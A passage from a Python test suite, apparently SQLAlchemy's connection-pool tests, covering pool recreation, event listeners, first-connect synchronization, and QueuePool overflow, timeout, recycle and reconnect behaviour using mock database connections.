is_(c1, c2)
r1.close()
assert not r1.connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not(c1, c2)
is_(c2, r1.connection)
eq_(c2.mock_calls, [])
@testing.combinations(
(
pool.QueuePool,
dict(pool_size=8, max_overflow=10, timeout=25, use_lifo=True),
),
(pool.QueuePool, {}),
(pool.NullPool, {}),
(pool.SingletonThreadPool, {}),
(pool.StaticPool, {}),
(pool.AssertionPool, {}),
)
def test_recreate_state(self, pool_cls, pool_args):
creator = object()
pool_args["pre_ping"] = True
pool_args["reset_on_return"] = "commit"
pool_args["recycle"] = 35
pool_args["logging_name"] = "somepool"
pool_args["dialect"] = default.DefaultDialect()
pool_args["echo"] = "debug"
p1 = pool_cls(creator=creator, **pool_args)
cls_keys = dir(pool_cls)
d1 = dict(p1.__dict__)
p2 = p1.recreate()
d2 = dict(p2.__dict__)
for k in cls_keys:
d1.pop(k, None)
d2.pop(k, None)
for k in (
"_invoke_creator",
"_pool",
"_overflow_lock",
"_fairy",
"_conn",
"logger",
):
if k in d2:
d2[k] = mock.ANY
eq_(d1, d2)
eq_(p1.echo, p2.echo)
is_(p1._dialect, p2._dialect)
if "use_lifo" in pool_args:
eq_(p1._pool.use_lifo, p2._pool.use_lifo)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
is_async = False
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "CL", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self, _is_asyncio=False):
p = self._queuepool_fixture(_is_asyncio=_is_asyncio)
canary = []
@event.listens_for(p, "checkin")
def checkin(*arg, **kw):
canary.append("checkin")
@event.listens_for(p, "close_detached")
def close_detached(*arg, **kw):
canary.append("close_detached")
@event.listens_for(p, "detach")
def detach(*arg, **kw):
canary.append("detach")
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_insert_event(self):
p = self._queuepool_fixture()
canary = []
def connect_one(*arg, **kw):
canary.append("connect_one")
def connect_two(*arg, **kw):
canary.append("connect_two")
def connect_three(*arg, **kw):
canary.append("connect_three")
event.listen(p, "connect", connect_one)
event.listen(p, "connect", connect_two, insert=True)
event.listen(p, "connect", connect_three)
p.connect()
eq_(canary, ["connect_two", "connect_one", "connect_three"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
@testing.combinations((True, testing.requires.python3), (False,))
def test_checkin_event_gc(self, detach_gced):
p, canary = self._checkin_event_fixture(_is_asyncio=detach_gced)
c1 = p.connect()
dbapi_connection = weakref.ref(c1.connection)
eq_(canary, [])
del c1
lazy_gc()
if detach_gced:
# "close_detached" is not called because for asyncio the
# connection is just lost.
eq_(canary, ["detach"])
else:
eq_(canary, ["checkin"])
gc_collect()
if detach_gced:
is_none(dbapi_connection())
else:
is_not_none(dbapi_connection())
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
engine.execute(select(1)).close()
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown_test(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
"""test for :ticket:`2964`, where the pool would not mutex the
initialization of the dialect.
Unfortunately, as discussed in :ticket:`6337`, this test suite did not
ensure that the ``Engine`` itself actually uses the "first_connect" event,
so when :ticket:`5497` came along, the "first_connect" event was no longer
used and no test detected the re-introduction of the exact same race
condition, which was now worse as the un-initialized dialect would now
pollute the SQL cache causing the application to not work at all.
A new suite has therefore been added in test/engine/test_execute.py->
OnConnectTest::test_initialize_connect_race to ensure that the engine
in total synchronizes the "first_connect" process, which now works
using a new events feature _exec_w_sync_on_first_run.
"""
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
# what we're trying to do here is have concurrent use of
# all three pooled connections at once, and the thing we want
# to test is that first_connect() finishes completely before
# any of the connections get returned. so first_connect()
# sleeps for one second, then pings the mock. the threads should
# not have made it to the "checkout() event for that one second.
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
# there is a very unlikely condition observed in CI on windows
# where even though we have five threads above all calling upon the
# pool, we didn't get concurrent use of all three connections, two
# connections were enough. so here we purposely just check out
# all three at once just to get a consistent test result.
make_sure_all_three_are_connected = [pool.connect() for i in range(3)]
for conn in make_sure_all_three_are_connected:
conn.close()
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
eq_(status(p), (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.timing_intensive
def test_timeout_subsecond_precision(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0, timeout=0.5)
c1 = p.connect() # noqa
with expect_raises(tsa.exc.TimeoutError):
now = time.time()
c2 = p.connect() # noqa
# Python timing is not very accurate, the time diff should be very
# close to 0.5s but we give 200ms of slack.
assert 0.3 <= time.time() - now <= 0.7, "Pool timeout not respected"
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
reaper = testing.engines.ConnectionKiller()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
reaper.add_pool(p)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
reaper.assert_all_closed()
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
with mutex:
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
c3 = p.connect()
is_not(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises_context_ok(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
@testing.requires.timing_intensive
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
# ensure pool invalidate time will be later than starttime
# for ConnectionRecord objects above
time.sleep(0.1)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.combinations((True, testing.requires.python3), (False,))
def test_userspace_disconnectionerror_weakref_finalizer(self, detach_gced):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, _is_asyncio=detach_gced
)
if detach_gced:
pool._dialect.is_async = True
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.connection
del conn
gc_collect()
if detach_gced:
# new connection was detached + abandoned on return
eq_(dbapi_conn.mock_calls, [])
else:
# new connection reset and returned to pool
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
